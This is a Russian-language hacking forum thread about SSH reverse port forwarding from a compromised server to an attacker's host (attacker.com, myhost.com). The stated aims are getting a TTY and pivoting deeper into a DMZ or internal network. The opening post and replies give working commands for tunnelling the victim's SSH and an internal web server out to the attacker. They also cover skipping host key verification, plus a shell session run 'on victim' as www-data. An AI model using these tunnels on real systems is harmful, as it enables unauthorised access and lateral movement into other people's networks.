![]() |
Получение доступа к DMZ или проброс портов спасёт мир..
Привет!
Хочу поделиться опытом проброса портов на локальную машину. Способ достаточно известный в админских кругах. Где это может понадобиться? Например следующая ситуации: 1. Сервер находится в DMZ и крайне необходима поддержка tty для того, что бы продолжить атаку на соседнии машины. 2. Веб-сервер доступен только с локальной сети. Что необходимо для начала: 1. Доступ к командной оболочке. 2. Доступ на запись в домашнюю директорию пользователя. Обозначения: attacker.com - ваш сервер pwnsever - скомпрометированный сервере На системе был проброшен back-connect до моего сервера и поднят рут. Задача стояла следующая - подключиться на взломаный сервер по ssh, ибо была необходима поддержка tty, для последующего изучения сети. Ниже используется авторизация по ключам, из-за того что она наиболее удобная в таких случаях. По паролю так же возможно авторизироваться, но это костыли (http://pentestmonkey.net/blog/ssh-with-no-tty/) Суть всего метода сводится к одной команде на pwnserver: Код:
ssh -R attacker.com:2233:pwnserver:22 attacker.com -i 'id_rsa' -T -N -f -l root Код:
+--------------------+ +--------------+ Код:
[root@attacker.com]# ssh -l root localhost -p2233 -i 'id_rsa' которые доступны с машины, где Вы вводите данную команду. Например: Код:
ssh -R attacker.com:8088:10.32.249.42:80 attacker.com -i 'id_rsa' -T -N -f -l root Код:
+--------------------+ +-----------------+ 1. "Host key verification failed." решается данная проблема следующей командой: Код:
ssh-keyscan -t rsa1,rsa,dsa localhost >> ~/.ssh/known_hosts |
on victim:
sh-3.2$ ssh-keygen ............... sh-3.2$ ls -la total 24 drwxr-xr-x 2 www-data www-data 4096 Sep 1 2008 . drwxr-xr-x 15 root root 4096 Feb 14 12:11 .. -rw------- 1 www-data www-data 1675 Apr 3 16:32 id_rsa -rw-r--r-- 1 www-data www-data 396 Apr 3 16:32 id_rsa.pub -rw-r--r-- 1 www-data www-data 4402 Apr 3 17:19 known_hosts ............................ ssh -R myhost.com:2233:localhost:22 myhost.com -i 'id_rsa' -T -N -f Host key verification failed. sh-3.2$ ssh-keyscan -t rsa1,rsa,dsa localhost >> ~/.ssh/known_hosts # localhost SSH-2.0-OpenSSH_5.1 # localhost SSH-2.0-OpenSSH_5.1 sh-3.2$ ssh -R myhost.com:2233:localhost:22 myhost.com -i 'id_rsa' -T -N -f Host key verification failed. в чем прокол? |
Цитата:
|
не не,делал и так и сяк.
|
дай вывод команды
ssh -R myhost.com:2233:localhost:22 myhost.com -i 'id_rsa' -T -N -f -vvv |
Нашёл решение проблемы, когда домашняя директория не доступна на запись и, соответственно, положить ключики в ~/.ssh/known_hosts не получается. Решение такое:
Код:
ssh -o 'StrictHostKeyChecking no' -i id_rsa -R 222:to_server:22 root@attacker -N -f |
Часовой пояс GMT +3, время: 03:24. |
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot